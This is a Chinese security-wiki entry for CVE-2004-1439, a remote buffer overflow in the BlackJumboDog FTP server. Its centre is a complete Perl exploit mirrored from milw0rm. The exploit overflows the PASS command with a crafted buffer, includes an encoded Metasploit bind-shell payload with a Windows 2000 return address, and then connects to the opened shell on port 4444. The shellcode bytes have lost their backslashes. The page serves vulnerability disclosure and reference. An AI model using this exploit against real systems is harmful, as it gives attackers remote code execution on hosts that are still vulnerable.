子比主题,更优雅的Wordpress主题
更优雅的WordPress网站主题:子比主题!全面开启

SapporoWorks BlackJumboDog FTP服务远程缓冲区溢出漏洞

190

SapporoWorks BlackJumboDog FTP服务远程缓冲区溢出漏洞

漏洞ID 1108109 漏洞类型 边界条件错误
发布时间 2004-08-05 更新时间 2005-10-20
图片[1]-SapporoWorks BlackJumboDog FTP服务远程缓冲区溢出漏洞-安全小百科CVE编号 CVE-2004-1439
 		图片[2]-SapporoWorks BlackJumboDog FTP服务远程缓冲区溢出漏洞-安全小百科CNNVD-ID CNNVD-200412-654
漏洞平台 Windows CVSS评分 7.5
|漏洞来源
https://www.exploit-db.com/exploits/378
http://www.cnnvd.org.cn/web/xxk/ldxqById.tag?CNNVD=CNNVD-200412-654
|漏洞详情
SapporoWorksBlackJumboDog是一款开放源代码集成代理服务,WEB和FTP服务的程序。SapporoWorksBlackJumboDog包含的FTP服务程序不正确处理多个命令参数数据,远程攻击者可以利用这个漏洞进行缓冲区溢出攻击,可能以进程权限在系统上执行任意指令。发送包含超长字符串作为参数的USER、PASS、RETR、CWD、XMKD、XRMD或其他命令,可触发缓冲区溢出,精心构建提交数据可能以进程权限在系统上执行任意指令。
|漏洞EXP
#!/usr/bin/perl
#
# blackJumboDog Exploit code by Tal zeltzer
#

use strict;
use IO::Socket::INET;

usage() unless(@ARGV == 2);

my $host = shift(@ARGV);
my $port = shift(@ARGV);

# win32_bind - Encoded Shellcode [x00x0ax09] [ EXITFUNC=seh LPORT=4444 Size=399 ] http://metasploit.com
my $shellcode =
"xd9xeexd9x74x24xf4x5bx31xc9xb1x5ex81x73x17x4fx85".
"x2fx98x83xebxfcxe2xf4xb3x6dx79x98x4fx85x7cxcdx19".
"xd2xa4xf4x6bx9dxa4xddx73x0ex7bx9dx37x84xc5x13x05".
"x9dxa4xc2x6fx84xc4x7bx7dxccxa4xacxc4x84xc1xa9xb0".
"x79x1ex58xe3xbdxcfxecx48x44xe0x95x4ex42xc4x6ax74".
"xf9x0bx8cx3ax64xa4xc2x6bx84xc4xfexc4x89x64x13x15".
"x99x2ex73xc4x81xa4x99xa7x6ex2dxa9x8fxdax71xc5x14".
"x47x27x98x11xefx1fxc1x2bx0ex36x13x14x89xa4xc3x53".
"x0ex34x13x14x8dx7cxf0xc1xcbx21x74xb0x53xa6x5fxce".
"x69x2fx99x4fx85x78xcex1cx0cxcax70x68x85x2fx98xdf".
"x84x2fx98xf9x9cx37x7fxebx9cx5fx71xaaxccxa9xd1xeb".
"x9fx5fx5fxebx28x01x71x96x8cxdax35x84x68xd3xa3x18".
"xd6x1dxc7x7cxb7x2fxc3xc2xcex0fxc9xb0x52xa6x47xc6".
"x46xa2xedx5bxefx28xc1x1exd6xd0xacxc0x7ax7ax9cx16".
"x0cx2bx16xadx77x04xbfx1bx7ax18x67x1axb5x1ex58x1f".
"xd5x7fxc8x0fxd5x6fxc8xb0xd0x03x11x88xb4xf4xcbx1c".
"xedx2dx98x5exd9xa6x78x25x95x7fxcfxb0xd0x0bxcbx18".
"x7ax7axb0x1cxd1x78x67x1axa5xa6x5fx27xc6x62xdcx4f".
"x0cxccx1fxb5xb4xefx15x33xa1x83xf2x5axdcxdcx33xc8".
"x7fxacx74x1bx43x6bxbcx5fxc1x49x5fx0bxa1x13x99x4e".
"x0cx53xbcx07x0cx53xbcx03x0cx53xbcx1fx08x6bxbcx5f".
"xd1x7fxc9x1exd4x6exc9x06xd4x7excbx1ex7ax5ax98x27".
"xf7xd1x2bx59x7ax7ax9cxb0x55xa6x7exb0xf0x2fxf0xe2".
"x5cx2ax56xb0xd0x2bx11x8cxefxd0x67x79x7axfcx67x3a".
"x85x47x68xc5x81x70x67x1ax81x1ex43x1cx7axffx98";

my $socket = IO::Socket::INET->new(proto=>'tcp',PeerAddr=>$host,PeerPort=>$port);
$socket or die "Cannot connect to host!n";

print "[+] Connected to hostrn";

$socket->autoflush(1);

#receive banner

my $repcode = "220 ";
my $response = recv_reply($socket,$repcode);

#send USER command

my $username = "anonymous";
print $socket "USER $usernamern";

$repcode = "";

select(undef, undef, undef, 1.002); # sleep of 1.2 sec


#Send PASS Command ( Evil Buffer )
# EIP At 308
# 7C4E2F60 - jmp ebx On kernel32.dll ( Windows 2000 SP4 )

printf "[+] Sending shellcodern";

my $buf = "A"x308;
$buf = $buf . "xEBx06xEBx06"; # Jump 6 bytes forward
$buf = $buf . "x60x2Fx4Ex7C";
$buf = $buf . $shellcode;
print $socket "PASS $bufrn";

select(undef, undef, undef, 1.002); # sleep of 1.2 sec


$repcode = "";
recv_reply($socket, $repcode);

close($socket);

system("telnet $host 4444");

exit(0);


sub usage
{
# print usage information
print "nUsage: jumbo.pl <host> <port>n
<host> - The host to connect to
<port> - The TCP portnn";
exit(1);
}

sub recv_reply
{
# retrieve any reply
my $socket = shift;
my $repcode = shift;
$socket or die "Can't receive on socketn";

my $res="";
while(<$socket>)
{
$res .= $_;
if (/$repcode/) { last; }
}
return $res;
}

# milw0rm.com [2004-08-05]
|参考资料

来源:US-CERTVulnerabilityNote:VU#714584
名称:VU#714584
链接:http://www.kb.cert.org/vuls/id/714584
来源:BID
名称:10834
链接:http://www.securityfocus.com/bid/10834
来源:XF
名称:blackjumbodog-long-string-bo(16842)
链接:http://xforce.iss.net/xforce/xfdb/16842
来源:www.security.org.sg
链接:http://www.security.org.sg/vuln/bjd361.html
来源:BUGTRAQ
名称:20040910BlackJumboDogFTPServerversion3.6.1BufferOverflow[Exploitincluded]
链接:http://www.ir3ip.net/pipermail/bugtraq/2004-September/009960.html
来源:SECUNIA
名称:12203
链接:http://secunia.com/advisories/12203
来源:NSFOCUS
名称:6750
链接:http://www.nsfocus.net/vulndb/6750

相关推荐: include.cgi读取任意文件漏洞

include.cgi读取任意文件漏洞 漏洞ID 1199777 漏洞类型 未知 发布时间 2005-04-25 更新时间 2005-04-25 CVE编号 CVE-2005-1295 CNNVD-ID CNNVD-200504-096 漏洞平台 N/A CV…

© 版权声明
文章版权归作者所有,未经允许请勿转载。
THE END
网络安全漏洞
# 漏洞# cnnvd# sapporoworks
喜欢就支持一下吧
点赞0
分享
相关推荐
安全小百科-Comdev eCommerce 3.0 – ‘config.php’ Remote File Inclusion
Comdev eCommerce 3.0 – ‘config.php’ Remote File Inclusion
Comdev eCommerce 3.0 – ‘config.php’ Remote File Inclusion
3年前 4732
安全小百科-帆软10.0 Getshell漏洞分析
帆软10.0 Getshell漏洞分析
帆软10.0 Getshell漏洞分析
3年前 1032
安全小百科-Multiple Lucent Router UDP Port 9 Information Disclosure Vulnerability
Multiple Lucent Router UDP Port 9 Information Disclosure Vulnerability
Multiple Lucent Router UDP Port 9 Information Disclosure Vulnerability
3年前 427
安全小百科-Symantec Enterprise Firewall DNSD DNS Cache Poisoning Vulnerability
Symantec Enterprise Firewall DNSD DNS Cache Poisoning Vulnerability
Symantec Enterprise Firewall DNSD DNS Cache Poisoning Vulnerability
3年前 408
安全小百科-iChat ROOMS Webserver任意文件读取漏洞
iChat ROOMS Webserver任意文件读取漏洞
iChat ROOMS Webserver任意文件读取漏洞
3年前 352
安全小百科-S.u.S.E. Linux useradd Vulnerability
S.u.S.E. Linux useradd Vulnerability
S.u.S.E. Linux useradd Vulnerability
3年前 333
搜索
开启精彩搜索
标签云
龟背龚某龙鱼龙马龙首龙车龙身龙芯龙生九子龙火龙海市龙泉驿区龙岩市龙女龙南县龙凤龙伯龍首龍門龍身
公司成功上市啦! - 作者:KOAL格尔国信-安全小百科

公司成功上市啦! – 作者:KOAL格尔国信

admin的头像-安全小百科3年前
048120
Comdev eCommerce 3.0 - 'config.php' Remote File Inclusion-安全小百科

Comdev eCommerce 3.0 – ‘config.php’ Remote File Inclusion

admin的头像-安全小百科3年前
47320
GeoServer漏洞利用总结及案例参考 - 作者:vlong6-安全小百科

GeoServer漏洞利用总结及案例参考 – 作者:vlong6

admin的头像-安全小百科3年前
016020
女祭女戚-安全小百科

女祭女戚

admin的头像-安全小百科3年前
011380
帆软10.0 Getshell漏洞分析-安全小百科

帆软10.0 Getshell漏洞分析

admin的头像-安全小百科3年前
010320
科锐逆向线上班完整版视频2020年 - 作者:hgjhf63fa-安全小百科

科锐逆向线上班完整版视频2020年 – 作者:hgjhf63fa

admin的头像-安全小百科3年前
08760
恐龙抗狼扛的头像-安全小百科

恐龙抗狼扛9月前0

kankan
admin的头像-安全小百科

啊啊啊啊3年前0

66666666666666